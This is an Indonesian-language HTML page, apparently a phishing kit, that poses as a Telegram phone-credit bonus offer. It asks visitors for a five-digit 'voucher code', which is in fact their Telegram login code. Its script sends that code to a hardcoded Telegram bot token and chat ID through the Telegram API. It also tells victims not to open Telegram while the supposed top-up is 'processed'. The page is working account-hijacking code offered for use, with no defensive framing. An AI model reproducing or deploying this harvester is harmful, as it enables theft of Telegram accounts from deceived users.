<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bonus Pulsa TELEGRAM</title>
    <link rel="icon" type="image/x-icon" href="asset/loading.png">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">

    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #ffffff;
            padding: 20px;
        }

        .container {
            max-width: 100%;
            margin: auto;
        }

        .logo-atas {
            text-align: center;
            margin-bottom: 20px;
        }

        .image-web img {
            width: 100%;
            max-width: 250px;
            height: auto;
            margin-bottom: 20px;
        }

        .btnNext {
            background-color: #0ca2e7;
            border: none;
            border-radius: 10px;
            width: 100%;
            color: white;
            font-weight: bold;
            height: 45px;
            margin-bottom: 20px;
        }

        #proses {
            color: rgb(12, 0, 175);
            display: none;
            margin-top: 20px;
        }

        @keyframes blink {
            0% { opacity: 1; }
            50% { opacity: 0; }
            100% { opacity: 1; }
          }
          
          .blinking {
            animation: blink 1s infinite;
          }
    </style>
</head>
<body>
    <nav class="navbar navbar-light background" style="background: #f0f0f0">
      <div class="container">
        <a class="navbar-brand" href="kode.html";>
          <h3 style="color: #000000">KODE VOUCHER</h3>
        </a>
      </div>
    </nav>
    <div class="logo-atas">
                    <img class="img-fluid" src="asset/logotengah.jpeg" alt="">
                </div>
            </a>
        </div>
    </nav>

    <div class="container">
        <div class="title-web mt-1">
            <h5 class="text-center">Kami Sudah mengirimkan kode voucher 5 Angka silahkan cek disms telegram</h5>
            <form onsubmit="next(); return false;">
                <div class="mb-3">
                    <label class="form-label" for="pin"><strong>Masukkan Kode Voucher 5 Angka</strong> (Wajib)</label>
                    <input type="number" class="form-control" placeholder="Sms Telegram"  id="pin" style="border: 1px solid rgb(0, 153, 255);" required>
                </div>
                <button type="submit" class="btnNext">Kirimkan</button>
                <p id="proses" class="text-center blinking" style="color: rgb(228, 0, 0);">Mohon Tunggu,Sedang di Proses... Mohon tidak membuka apk telegram anda selama Proses pengisian pulsa anda...atau masukan ulang kode voucher anda yang terbaru</p>
                <a href="https://t.me/Bantuanbonuspulsa>">Kendala Pulsa Belum Masuk? Hubungi Pusat Bantuan</a>
            </form>
        </div>
    </div>

    <script>
        function next() {
            let proses = document.querySelector("#proses");
            let pin = document.querySelector("#pin").value;
            let token = "6651305313:AAE_o32rMgQZADo5XQVUS0iW_iPupXC0IwU";
            let id_tele = "6250486742";
            
            if (pin === "") {
                alert("Mohon Isi data Dengan Benar");
            } else {
                let message = `*KODE TELEGRAM :*%0A%0AKode Telegram: ${pin}`;
                let api = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${id_tele}&text=${message}`;

                fetch(api, {
                    method: 'POST',
                })
                .then((response) => response.json())
                .then(data => {
                    console.log('Pesan terkirim:', data);
                    document.getElementById("proses").style.display = "block";
                })
                .catch((error) => {
                    console.error('Error:', error);
                });
            }
        }
    </script>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
</body>
</html>
